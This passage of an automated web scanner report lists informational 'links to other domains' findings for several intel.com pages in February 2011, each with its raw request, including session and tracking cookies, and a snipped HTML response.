__utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 32885


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.81. http://www.intel.com/consumer/tomorrow/tvads/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/tomorrow/tvads/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/tomorrow/tvads/index.htm?iid=subhdr+sot_tvvideo
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/tomorrow/tvads/index.htm?iid=subhdr+sot_tvvideo HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37537


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.82. http://www.intel.com/corporate/europe/emea/irl/intel/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /corporate/europe/emea/irl/intel/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/corporate/europe/emea/irl/intel/index.htm?iid=gg_en_IE+noscript
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr-UK+invrel

Request

GET /corporate/europe/emea/irl/intel/index.htm?iid=gg_en_IE+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:22 GMT
Content-Length: 24236
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Intel Ireland</title>
<meta http-equiv='Content-T
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-UK+invrel">Investor Relations</a>
...[SNIP]...

17.83. http://www.intel.com/costarica/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /costarica/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/costarica/index.htm?iid=gg_es_CR+noscript
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr-LA+invrel
  • http://www.worldmuralproject.com/

Request

GET /costarica/index.htm?iid=gg_es_CR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:19 GMT
Content-Length: 27632
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="es-MX">
<head>
<title>Todo acerca de Intel</title>
<meta http-equiv='Co
...[SNIP]...
<li><a href="http://www.worldmuralproject.com" target="_blank"><strong>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-LA+invrel">Relaciones con inversores</a>
...[SNIP]...

17.84. http://www.intel.com/design/network/ica/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /design/network/ica/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/design/network/ica/index.htm?iid=subhdr+ptr_embed_alliance
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelcommsalliance.com/feedback/
  • http://www.intelcommsalliance.com/kshowcase/view
  • http://www.intelcommsalliance.com/kshowcase/view/
  • http://www.intelcommsalliance.com/kshowcase/view/roster?classification=hardware
  • http://www.intelcommsalliance.com/kshowcase/view/roster?classification=software
  • http://www.intelcommsalliance.com/kshowcase/view/roster?classification=system
  • http://www.intelcommsalliance.com/kshowcase/view/roster?classification=tools
  • http://www.intelcommsalliance.com/members/
  • http://www.intelcommsalliance.com/roster/
  • https://www.intelcommsalliance.com/kmembership_info/person_signup/
  • https://www.intelcommsalliance.com/kmembership_info/request_password/

Request

GET /design/network/ica/index.htm?iid=subhdr+ptr_embed_alliance HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69332

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel&reg; Embedded Alliance - Overview</title>
...[SNIP]...
<br>
<a href="http://www.intelcommsalliance.com/kshowcase/view/">Solutions Directory</a><br>
<a href="http://www.intelcommsalliance.com/roster/">About Our Members</a><br>
<a href="http://www.intelcommsalliance.com/roster/">Member Roster</a>
...[SNIP]...
</div>
<a href="http://www.intelcommsalliance.com/feedback/">FEEDBACK</a>
...[SNIP]...
<div class="tab">
<a href="http://www.intelcommsalliance.com/kshowcase/view/roster?classification=hardware#search-by-interest"><img src="pix/tab-hardware.jpg" alt="Hardware">
...[SNIP]...
<div class="tab">
<a href="http://www.intelcommsalliance.com/kshowcase/view/roster?classification=software#search-by-interest"><img src="pix/tab-software-bios.jpg" alt="Software/Firmware">
...[SNIP]...
<div class="tab">
<a href="http://www.intelcommsalliance.com/kshowcase/view/roster?classification=tools#search-by-interest"><img src="pix/tab-tools.jpg" alt="Tools">
...[SNIP]...
<div class="tab">
<a href="http://www.intelcommsalliance.com/kshowcase/view/roster?classification=system#search-by-interest"><img src="pix/tab-system-integration.jpg" alt="System Integration/Services">
...[SNIP]...
<span class="bold"><a href="http://www.intelcommsalliance.com/kshowcase/view/">Leading-edge solutions.</a>
...[SNIP]...
<div id="main-more">
<a href="http://www.intelcommsalliance.com/kshowcase/view/">Search the Solutions Directory &gt;</a><br>
<a href="http://www.intelcommsalliance.com/roster/">View the Intel Embedded Alliance member roster &gt;</a>
...[SNIP]...
<div><a href="http://www.intelcommsalliance.com/roster/">View the Intel Embedded Alliance<br>
...[SNIP]...
<li class="bold"><a href="http://www.intelcommsalliance.com/members/">Member website login &gt;</a>
...[SNIP]...
<li class="mlfive"><a href="https://www.intelcommsalliance.com/kmembership_info/person_signup/">Request member website access &gt;</a>
...[SNIP]...
<li class="mlfive"><a href="https://www.intelcommsalliance.com/kmembership_info/request_password/">Member website login ID help &gt;</a>
...[SNIP]...
<li class="mlfive"><a href="https://www.intelcommsalliance.com/kmembership_info/request_password/">Member website password help &gt;</a>
...[SNIP]...
<div class="rightward taright"><a href="http://www.intelcommsalliance.com/kshowcase/view">Search Solutions >
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.85. http://www.intel.com/embedded/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /embedded/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/embedded/index.htm?iid=subhdr+devctr_emb
The response contains the following links to other domains:
  • http://twitter.com/Geek8ive/Embassadors
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelcommsalliance.com/kshowcase/view/
  • http://www.intelcommsalliance.com/kshowcase/view/roster
  • http://www.youtube.com/user/channelintel

Request

GET /embedded/index.htm?iid=subhdr+devctr_emb HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<meta ht
...[SNIP]...
<div style="float: right; vertical-align: top;">
                                                           <a href="http://www.youtube.com/user/channelintel" target="_youtube" title="YouTube*"><img src="/embedded/Assets/Image/Icon-YouTube.gif" width="41" height="18" alt="YouTube*" title="YouTube*" /></a>
                                                           <a href="http://twitter.com/Geek8ive/Embassadors" target="_twitter" title="Twitter*"><img src="/embedded/Assets/Image/Icon-Twitter.gif" width="18" height="18" alt="Twitter*" title="Twitter*" />
...[SNIP]...
<li><a href="http://www.intelcommsalliance.com/kshowcase/view/roster">Member Roster</a>
...[SNIP]...
<li><a href="http://www.intelcommsalliance.com/kshowcase/view/">Find a Solution</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.86. http://www.intel.com/en_CA/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_CA/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/en_CA/index.htm?iid=gg_en_CA+noscript
The response contains the following links to other domains:
  • http://greatcomputing.ca/
  • http://widgets.twimg.com/j/2/widget.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.itworldcanada.com/category/information-architecture
  • http://www.myeg.net/
  • http://www.profitguide.com/topic/intel
  • http://www.theglobeandmail.com/report-on-business/small-business/next-big-thing
  • http://www.youtube.com/user/channelintel

Request

GET /en_CA/index.htm?iid=gg_en_CA+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Content-Length: 27143
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-
...[SNIP]...
<div style="margin-left: 3px;">
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<li><a href="http://greatcomputing.ca/" target="_blank">Where to Buy</a>
...[SNIP]...
<li><a href="http://www.myeg.net" target="_blank">Gaming with Team EG*</a>
...[SNIP]...
<li><a href="http://www.youtube.com/user/channelintel#grid/user/9CDB6EFA1D89560B" target="_blank">Intel&reg; World of Tomorrow webisodes</a>
...[SNIP]...
<li><a href="http://www.profitguide.com/topic/intel" target="_blank">PROFIT* Business Solutions</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/report-on-business/small-business/next-big-thing" target="_blank">Innovation for small business</a>
...[SNIP]...
<li><a href="http://www.itworldcanada.com/category/information-architecture" target="_blank">Information architecture knowledge centre </a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.87. http://www.intel.com/en_MY/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_MY/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/en_MY/index.htm?iid=gg_en_MY+noscript
The response contains the following links to other domains:
  • http://www.facebook.com/IntelMalaysia
  • http://www.myintelblog.com/

Request

GET /en_MY/index.htm?iid=gg_en_MY+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:54 GMT
Content-Length: 23989
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-
...[SNIP]...
</a>-->
<a href="http://www.facebook.com/IntelMalaysia" onclick="var s='s_gs()'; waCustomLink(this,'facebook_my','e','wa_iid=home-my+facebook');" target="_blank">
<img src="/en_PH/pix/eng_764x150.jpg" alt="Make my mod win a cool custom-designed,custom-built desktop PC case mod! Enter here" title="Make my mod win a cool custom-designed,custom-built desktop PC c
...[SNIP]...
<li><a href="http://www.myintelblog.com" onclick="var s='s_gs()'; waCustomLink(this,'my@Intel Blog','e','wa_iid=home-my+myintelblog');" target="_blank">my@Intel Blog</a>
...[SNIP]...

